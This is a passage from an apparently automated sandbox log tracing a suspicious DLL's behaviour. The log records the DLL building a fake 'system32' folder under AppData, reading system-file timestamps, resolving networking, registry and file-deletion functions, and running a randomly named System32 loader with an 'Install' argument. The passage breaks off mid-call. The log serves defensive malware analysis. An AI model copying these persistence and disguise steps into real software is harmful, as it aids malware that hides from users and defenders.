[0032.759] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.759] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.759] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.759] wsprintfA (in: param_1=0x24f3c0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.759] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.759] wsprintfA (in: param_1=0x24f2bc, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.759] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.760] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.760] CloseHandle (hObject=0x74) returned 1 [0032.760] GetLastError () returned 0x0 [0032.760] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.760] GetLastError () returned 0x0 [0032.760] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.760] GetSystemDirectoryA (in: lpBuffer=0x24f3c0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.760] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.760] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.760] CloseHandle (hObject=0x74) returned 1 [0032.760] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.767] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.767] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.768] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.768] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.768] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.768] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.768] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.769] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.769] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.769] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.769] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.770] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.770] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.770] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.770] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.771] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.771] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.771] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.771] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.771] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.771] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.772] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.772] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.772] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.772] AddAtomS () returned 0x0 [0032.773] HeapDestroy (hHeap=0xf0000) returned 1 Process: id = "27" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f9c0" os_pid = "0xb94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"Install\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1270 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1271 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1272 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1273 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1274 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1275 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1276 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1277 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1278 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1279 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1280 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1281 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1282 start_va = 0x2d0000 end_va = 0x336fff entry_point = 0x2d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1283 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1284 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1285 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1286 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1287 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1288 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1289 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1290 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1291 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1292 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1293 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1294 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1295 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1296 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1297 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1298 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1299 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1300 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1301 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1302 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1303 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1304 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1305 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1306 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1307 start_va = 0x1200000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1308 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1309 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1310 start_va = 0x12d0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Thread: id = 60 os_tid = 0xb98 [0032.809] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af844 | out: lpSystemTimeAsFileTime=0x1af844*(dwLowDateTime=0xe147f990, dwHighDateTime=0x1d3dfba)) [0032.809] GetCurrentProcessId () returned 0xb94 [0032.809] GetCurrentThreadId () returned 0xb98 [0032.809] GetTickCount () returned 0x175bb [0032.809] QueryPerformanceCounter (in: lpPerformanceCount=0x1af83c | out: lpPerformanceCount=0x1af83c*=365119519) returned 1 [0032.810] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.810] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.810] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.810] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.810] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.810] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.810] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.810] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.810] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.810] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.810] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.810] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.810] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.811] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.811] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.811] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.811] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.811] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.811] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.811] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.811] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.811] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.811] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.812] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.812] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.812] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.812] GetCurrentThreadId () returned 0xb98 [0032.812] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"Install\"" [0032.812] GetEnvironmentStringsW () returned 0x1e7858* [0032.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x12c09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.812] FreeEnvironmentStringsW (penv=0x1e7858) returned 1 [0032.812] GetStartupInfoA (in: lpStartupInfo=0x1af794 | out: lpStartupInfo=0x1af794*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.812] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.812] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.812] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.812] SetHandleCount (uNumber=0x20) returned 0x20 [0032.812] GetLastError () returned 0x0 [0032.812] SetLastError (dwErrCode=0x0) [0032.813] GetLastError () returned 0x0 [0032.813] SetLastError (dwErrCode=0x0) [0032.813] GetLastError () returned 0x0 [0032.813] SetLastError (dwErrCode=0x0) [0032.813] GetACP () returned 0x4e4 [0032.813] GetLastError () returned 0x0 [0032.813] SetLastError (dwErrCode=0x0) [0032.813] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.813] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1af774 | out: lpCPInfo=0x1af774) returned 1 [0032.813] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1af240 | out: lpCPInfo=0x1af240) returned 1 [0032.813] GetLastError () returned 0x0 [0032.813] SetLastError (dwErrCode=0x0) [0032.813] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1af1d0 | out: lpCharType=0x1af1d0) returned 1 [0032.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af654, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af654, cbMultiByte=256, lpWideCharStr=0x1aefb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.813] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x1af254 | out: lpCharType=0x1af254) returned 1 [0032.813] GetLastError () returned 0x0 [0032.813] SetLastError (dwErrCode=0x0) [0032.813] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af654, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af654, cbMultiByte=256, lpWideCharStr=0x1aef88, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿⴾ矲狰Ā") returned 256 [0032.813] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿⴾ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.813] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" 